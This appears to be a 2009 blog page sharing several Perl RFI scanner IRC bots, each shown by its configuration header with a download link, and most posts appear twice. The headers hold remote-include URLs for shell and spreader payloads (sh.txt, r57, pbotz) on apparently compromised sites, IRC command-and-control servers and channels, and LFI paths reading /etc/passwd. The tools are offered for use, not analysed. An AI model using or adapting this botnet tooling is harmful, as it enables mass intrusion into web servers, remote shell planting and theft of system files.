# ------------- [% ASC %] -------------
# Mafia_KB, i hope i pretty fucked up your sell
# asking 2000 fucking euros for a crappy scan ?
# this one is 1000 times better so i hope
# it affects your sell even more lol.
use HTTP::Request;
use LWP::UserAgent;
use IO::Socket::INET;
#################
#[Configuration]#
#################
my $response = "http://www.emabe.com/administrator/templates/response.txt??"; # included in zip as response.txt
my $test = "http://www.emabe.com/administrator/templates/test.txt??"; # included in zip as test.txt
my $printcmd = "http://www.yourhost.com/sh.txt??";
my $responselfi = "/../../../../../../../../etc/passwd";
my $printcmdlfi = "/../../../../../../../../etc/passwd";
my $spread = "http://yourhost.com/pbotz.txt??";
my $nickname = "ngising|".(int(rand(999)));
my $ident = "RFiBeast";
my $channel = "#kill-9";
my $server = "irc.pengangguran.us.to";
my $port = 6667;
#################
#[Configuration]#
#################
Download [lengkap + id]
Tuesday, 15 December 2009
Bajo Sanner
***************************
AUTOR: arianom
DATE :Desember 2009
LINGUAGE: perl (.pl)
**************************
#!/usr/bin/perl
$process = "/usr/sbin/arianom";
my $printcmd = "http://kill-nine.co.nr??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $spreads = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $ircserver = "irc.indonesiancoder.us";
my $start = "!scan";
my $port = "6667";
my $nickname = "sedih" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Pbot RFI Scanner v1.0 beta";
print "\n";
print " Priv 8 Scanner\n";
print " Author: Arianom\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;
Download [lengkpa + id]
AUTOR: arianom
DATE :Desember 2009
LINGUAGE: perl (.pl)
**************************
#!/usr/bin/perl
$process = "/usr/sbin/arianom";
my $printcmd = "http://kill-nine.co.nr??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $id = "http://www.urisan.tche.br/~escola//asu/bajo-id.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $spreads = "http://www.urisan.tche.br/~escola//asu/bajo-spread.txt??";
my $ircserver = "irc.indonesiancoder.us";
my $start = "!scan";
my $port = "6667";
my $nickname = "sedih" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Pbot RFI Scanner v1.0 beta";
print "\n";
print " Priv 8 Scanner\n";
print " Author: Arianom\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;
Download [lengkpa + id]
Sunday, 13 December 2009
Zell Scanner
***************************
AUTOR: ZELL
DATE :Juli 2008
LINGUAGE: perl (.pl)
***************************
#!/usr/bin/perl
$process = "/usr/local/apache/bin/httpd -DSSL";
my $printcmd = "http://www.urisan.tche.br/~escola//asu/sh.txt?";
my $id = "http://www.urisan.tche.br/~escola//asu/id-vnc.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/usil-spreads.txt?";
my $ircserver = "irc.kamtiez.punked.us";
my $start = "!scan4";
my $port = "6667";
my $nickname = "kill[RFI][" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Priv8 RFI Scanner v3.0 FULL VERSION";
print "\n";
print " Priv 8 Scanner\n";
print " Author: ara";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;
Download [lengkap + id]
AUTOR: ZELL
DATE :Juli 2008
LINGUAGE: perl (.pl)
***************************
#!/usr/bin/perl
$process = "/usr/local/apache/bin/httpd -DSSL";
my $printcmd = "http://www.urisan.tche.br/~escola//asu/sh.txt?";
my $id = "http://www.urisan.tche.br/~escola//asu/id-vnc.txt??";
my $spread = "http://www.urisan.tche.br/~escola//asu/usil-spreads.txt?";
my $ircserver = "irc.kamtiez.punked.us";
my $start = "!scan4";
my $port = "6667";
my $nickname = "kill[RFI][" . int( rand(999) ) . "]";
my $admin = "arianom";
my $channel = "#kill-9"; ## the normal chan to scan, and see the results too :P
my $chanres = "#kill-9"; ## the channel where u can find all the results of the bot
my $verz = "Priv8 RFI Scanner v3.0 FULL VERSION";
print "\n";
print " Priv 8 Scanner\n";
print " Author: ara";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;
Download [lengkap + id]
Saturday, 12 December 2009
Alb Scanner
***************************
AUTORE: Arianom
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************
#!/usr/bin/perl
$process = "/usr/sbin/ateam";
my $printcmd = "http://www.ambient-arts.co.uk/modules/sh.txt??";
my $id = "http://www.ambient-arts.co.uk/modules/id.txt??";
my $spread = "http://www.urisan.tche.br/pbotz.txt??";
my $ircserver = "209.41.180.98";
my $start = "!scan";
my $port = "8400";
my $nickname = "ALB[" . int( rand(999) ) . "]";
my $admin = "arianom","arianom";
my $channel = "#kamtiez"; ## the normal chan to scan
my $chanres = "#kamtiez"; ## the channel where u can find the results
my $verz = "Priv8 RFI Scanner v1.0 beta";
print "\n";
print " Priv 8 Scanner\n";
print " Author: SeaNet\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;
Download [lengkap + id]
AUTORE: Arianom
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************
#!/usr/bin/perl
$process = "/usr/sbin/ateam";
my $printcmd = "http://www.ambient-arts.co.uk/modules/sh.txt??";
my $id = "http://www.ambient-arts.co.uk/modules/id.txt??";
my $spread = "http://www.urisan.tche.br/pbotz.txt??";
my $ircserver = "209.41.180.98";
my $start = "!scan";
my $port = "8400";
my $nickname = "ALB[" . int( rand(999) ) . "]";
my $admin = "arianom","arianom";
my $channel = "#kamtiez"; ## the normal chan to scan
my $chanres = "#kamtiez"; ## the channel where u can find the results
my $verz = "Priv8 RFI Scanner v1.0 beta";
print "\n";
print " Priv 8 Scanner\n";
print " Author: SeaNet\n";
print " Release $verz\n";
print " Server $ircserver:$port\n";
print " $channel and $chanres\n";
print " Enjoy ;)\n\n";
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
require LWP;
$|++;
Download [lengkap + id]
Friday, 11 December 2009
Italian Scanner
***************************
AUTOR: Arianom
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************
# SCAN RFI V.1.0 CoDe By arianom
#--------------------------------------------
#--------------------------------------------
# L'AUTORE SI ESENTA DA QUALSIASI UTILIZZO
#--------------------------------------------
# Coyprgiht L 2008 arianom
#--------------------------------------------
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
my $linas_max='10';
my $sleep='1';
my $processo ="httpds";
my $cmd="http://www.bangkoksexy.com//generator/data/rr.txt??";
my $id="http://www.bangkoksexy.com//generator/data/glup.txt";
my $spread="http://www.bangkoksexy.com//generator/data/siri.txt";
my $server="irc.arianom.info.tm";
my $porta="8400";
my $numero=int(rand(100));
my $nick="[Private]".$numero;
my $canale="#staff";
my $verbot = "1.01";
my $stringa = "!scan";
my $adm = "arianom";
my $out = "!addio".$numero;
my $c0der= "arianom"; #si prega di lasciarlo cos?
Download [lengkap + id]
AUTOR: Arianom
DATE :Juli 2008
LINGUAGE: perl (.pl)
**************************
# SCAN RFI V.1.0 CoDe By arianom
#--------------------------------------------
#--------------------------------------------
# L'AUTORE SI ESENTA DA QUALSIASI UTILIZZO
#--------------------------------------------
# Coyprgiht L 2008 arianom
#--------------------------------------------
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
my $linas_max='10';
my $sleep='1';
my $processo ="httpds";
my $cmd="http://www.bangkoksexy.com//generator/data/rr.txt??";
my $id="http://www.bangkoksexy.com//generator/data/glup.txt";
my $spread="http://www.bangkoksexy.com//generator/data/siri.txt";
my $server="irc.arianom.info.tm";
my $porta="8400";
my $numero=int(rand(100));
my $nick="[Private]".$numero;
my $canale="#staff";
my $verbot = "1.01";
my $stringa = "!scan";
my $adm = "arianom";
my $out = "!addio".$numero;
my $c0der= "arianom"; #si prega di lasciarlo cos?
Download [lengkap + id]
Thursday, 10 December 2009
Feelcomz Scanner
***************************
AUTORE: FeeLCoMz
DATE :Juli 2008
LINGUAGE: perl (.pl)
***************************
#!/usr/bin/perl
################################################
## Kill-9 RFI Scanner Bot v2.4 ##
## By arianom ##
## Copyleft July 2008 ##
## Usage: perl ht.pl ##
################################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
###################
## CONFIGURATION ##
###################
my $id = " http://pianobarcafe.com/groups/idfx.txt";
my $shell = "http://jeannedawsonart.com/images/r57???";
my $spread = "";
#my $id = "http://pianobarcafe.com/groups/idfx.txt";
#my $shell = "http://jeannedawsonart.com/images/r57???";
download [lengkap + id]
AUTORE: FeeLCoMz
DATE :Juli 2008
LINGUAGE: perl (.pl)
***************************
#!/usr/bin/perl
################################################
## Kill-9 RFI Scanner Bot v2.4 ##
## By arianom ##
## Copyleft July 2008 ##
## Usage: perl ht.pl
################################################
use IO::Socket::INET;
use HTTP::Request;
use LWP::UserAgent;
###################
## CONFIGURATION ##
###################
my $id = " http://pianobarcafe.com/groups/idfx.txt";
my $shell = "http://jeannedawsonart.com/images/r57???";
my $spread = "";
#my $id = "http://pianobarcafe.com/groups/idfx.txt";
#my $shell = "http://jeannedawsonart.com/images/r57???";
download [lengkap + id]
Subscribe to:
Posts (Atom)